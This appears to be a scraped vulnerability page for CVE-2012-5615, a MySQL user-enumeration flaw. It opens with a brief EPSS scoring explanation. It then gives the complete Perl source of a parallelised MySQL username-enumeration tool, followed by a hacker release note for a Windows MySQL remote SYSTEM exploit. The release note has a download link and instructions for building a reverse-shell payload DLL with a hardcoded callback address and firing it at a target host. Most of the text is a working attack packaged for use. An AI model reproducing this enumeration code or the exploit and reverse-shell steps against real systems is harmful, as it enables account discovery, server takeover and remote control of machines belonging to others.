CVE-2012-5615 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# MySQL User Account Enumeration Utility # When an attacker authenticates using an incorrect password # with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server # the mysql server will respond with a different message than Access Denied, what makes # User Account Enumeration possible. # The Downside is that the attacker has to reconnect for each user enumeration attempt #20000 user accounts in 7 minutes #Mon Jan 16 09:00:18 UTC 2012 #Mon Jan 16 09:07:26 UTC 2012 #root@vs2067037:~# wc -l MEDIUM.LST #21109 MEDIUM.LST #A usernames.txt wordlist is included in this package #examples: #root@vs2067037:~# perl mysqlenum.pl host usernames.txt # #[*] HIT! -- USER EXISTS: administrator@host # #root@vs2067037:~# perl mysqlenum.pl host usernames.txt # #[*] HIT! -- USER EXISTS: admin@host # use IO::Socket; use Parallel::ForkManager; $|=1; if ($#ARGV != 1) { print "Usage: mysqlenumerate.pl <target> <wordlist>\n"; exit; } $target = $ARGV[0]; $wordlist = $ARGV[1]; $numforks = 50; $pm = new Parallel::ForkManager($numforks); open FILE,"<$wordlist"; unlink '/tmp/cracked'; @users = (); $k=0; while(<FILE>) { chomp; $_ =~ s/\r//g; $users[$k++] = $_; } close FILE; $k2 = 0; for(;;) { for ($k=0;$k<$numforks;$k++) { $k2++; if (($k2 > $#users) or (-e '/tmp/cracked')) { exit; } my $pid = $pm->start and next; $user = $users[$k2]; goto further; again: print "Connect Error\n"; further: my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '3306', Proto => 'tcp') || goto again; recv($sock, $buff, 1024, 0); $buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50". "\x4e\x5f\x51\x55\x45\x4d\x45\x00"; $buf = chr(length($buf)-3). $buf; print $sock $buf; $res = recv($sock, $buff, 1024, 0); close($sock); if ($k2 % 100 == 0) { print $buff."\n"; } if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;} unless (-e '/tmp/cracked') { open FILE, ">/tmp/cracked"; close FILE; print "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; open FILE, ">jackpot"; print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n"; exit; } } $pm->wait_all_children; }

*** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owned By Kingcope https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz Installation Instructions ============================= 1. Install mysql client libraries and headers (UNIX) RedHat based (e.g. CentOS): yum install mysql mysql-devel 2. Compile the standalone exploit issue commands: gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient 3. Compile the reverse shell payload (this is required!) required because the connect back ip and port are hardcoded in the dll: use mingw on windows or wine change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443). issue commands: set PATH=%PATH%;c:\MinGW\bin\ gcc -c payload.c gcc -shared -o payload.dll payload.o -lws2_32 copy the payload.dll into the mysqljackpot exploit folder 4. Run The Exploit ./mysqljackpot -u root -p "" -t 99.99.99.99 A valid database admin user and his password are required for the exploit to work properly. This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package. Be sure to have the firewall open on the desired reverse port on the attacking machine. 5. Enjoy your SYSTEM Shell!!! Yours Sincerely, -- Kingcope